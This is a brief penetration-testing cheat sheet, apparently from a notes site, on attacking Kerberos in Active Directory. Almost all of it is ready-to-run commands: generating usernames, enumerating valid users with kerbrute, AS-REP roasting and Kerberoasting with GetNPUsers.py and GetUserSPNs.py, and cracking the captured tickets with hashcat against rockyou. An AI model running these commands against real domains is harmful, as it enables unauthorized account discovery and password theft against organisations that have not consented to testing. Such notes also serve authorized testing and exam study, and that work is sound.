Kerberos

Compile usernames

/opt/username-anarchy/username-anarchy --input-file ./test-names.txt

Find valid users

kerbrute userenum /usr/share/wordlists/seclists/Usernames/Names/names.txt -d $domain --dc $ip

uf dont require preauth

GetNPUsers.py $domain/ -no-pass -usersfile /path/to/names.txt -dc-ip $ip

hashcat -d 2 krb5asrep.txt -m 18200 -a 0 /usr/share/wordlists/rockyou.txt

python3 /usr/local/bin/GetUserSPNs.py domain.com/user:password -dc-ip $ip -request

hashcat -d 2 krb5tgs.txt -m 13100 -a 0 /usr/share/wordlists/rockyou.txt

Last updated 1 year ago